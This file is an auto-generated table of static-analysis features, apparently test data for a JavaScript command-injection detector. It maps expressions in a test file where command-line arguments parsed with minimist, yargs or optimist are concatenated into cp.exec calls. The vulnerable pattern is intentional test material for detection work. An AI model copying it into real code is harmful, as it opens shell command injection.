contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:17 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:17 | "cmd.sh " | stringConcatenatedWith | -endpoint- import(!)().foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:45 | "cmd.sh ... )().foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:45 | "cmd.sh ... )().foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:45 | "cmd.sh ... )().foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:45 | "cmd.sh ... )().foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:45 | "cmd.sh ... )().foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:45 | "cmd.sh ... )().foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:9:31:45 | "cmd.sh ... )().foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:27 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:27 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:39 | exceptional return of require("minimist") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:39 | exceptional return of require("minimist") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:39 | exceptional return of require("minimist") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:39 | require("minimist") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:39 | require("minimist") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:39 | require("minimist") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:41 | exceptional return of require ... ist")() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:41 | exceptional return of require ... ist")() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:41 | exceptional return of require ... ist")() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:41 | require ... ist")() | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:41 | require ... ist")() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:41 | require ... ist")() | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:45 | require ... )().foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:45 | require ... )().foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:45 | require ... )().foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:21:31:45 | require ... )().foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:29:31:38 | "minimist" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:29:31:38 | "minimist" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:29:31:38 | "minimist" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:29:31:38 | "minimist" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:29:31:38 | "minimist" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:29:31:38 | "minimist" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:43:31:45 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:43:31:45 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:31:43:31:45 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:2 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:2 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:2 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:7 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:7 | cp.exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:7 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:46 | cp.exec ... gv.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:46 | cp.exec ... gv.foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:46 | cp.exec ... gv.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:46 | exceptional return of cp.exec ... gv.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:46 | exceptional return of cp.exec ... gv.foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:1:32:46 | exceptional return of cp.exec ... gv.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:4:32:7 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:4:32:7 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:4:32:7 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:17 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:17 | "cmd.sh " | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:17 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:17 | "cmd.sh " | stringConcatenatedWith | -endpoint- import(!).argv.foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:9:32:45 | "cmd.sh ... rgv.foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:27 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:27 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:36 | exceptional return of require("yargs") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:36 | exceptional return of require("yargs") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:36 | exceptional return of require("yargs") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:36 | require("yargs") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:36 | require("yargs") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:36 | require("yargs") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:41 | require ... ").argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:45 | require ... rgv.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:45 | require ... rgv.foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:45 | require ... rgv.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:21:32:45 | require ... rgv.foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:29:32:35 | "yargs" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:29:32:35 | "yargs" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:29:32:35 | "yargs" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:29:32:35 | "yargs" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:29:32:35 | "yargs" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:29:32:35 | "yargs" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:38:32:41 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:38:32:41 | argv | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:38:32:41 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:43:32:45 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:43:32:45 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:32:43:32:45 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:2 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:2 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:2 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:7 | cp.exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:7 | cp.exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:7 | cp.exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:49 | cp.exec ... gv.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:49 | cp.exec ... gv.foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:49 | cp.exec ... gv.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:49 | exceptional return of cp.exec ... gv.foo) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:49 | exceptional return of cp.exec ... gv.foo) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:1:33:49 | exceptional return of cp.exec ... gv.foo) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:4:33:7 | exec | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:4:33:7 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:4:33:7 | exec | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:17 | "cmd.sh " | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:17 | "cmd.sh " | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:17 | "cmd.sh " | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:17 | "cmd.sh " | stringConcatenatedWith | -endpoint- import(!).argv.foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:9:33:48 | "cmd.sh ... rgv.foo | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:27 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:27 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:27 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:39 | exceptional return of require("optimist") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:39 | exceptional return of require("optimist") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:39 | exceptional return of require("optimist") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:39 | require("optimist") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:39 | require("optimist") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:39 | require("optimist") | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:44 | require ... ").argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:48 | require ... rgv.foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:48 | require ... rgv.foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:48 | require ... rgv.foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:21:33:48 | require ... rgv.foo | stringConcatenatedWith | 'cmd.sh ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:29:33:38 | "optimist" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:29:33:38 | "optimist" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:29:33:38 | "optimist" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:29:33:38 | "optimist" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:29:33:38 | "optimist" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:29:33:38 | "optimist" | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:41:33:44 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:41:33:44 | argv | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:41:33:44 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:46:33:48 | foo | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:46:33:48 | foo | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:33:46:33:48 | foo | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:1:44:2 | (functi ... T OK\\n}) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:1:44:2 | (functi ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:1:44:2 | (functi ... T OK\\n}) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | cp | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | require | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | require | enclosingFunctionBody | args require yargs command serve [port] start the server yargs option verbose foo bar argv cp exec cmd.sh args cp exec cmd.sh require yargs array foo parse foo | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | require | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:35:2:35:1 | require | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| 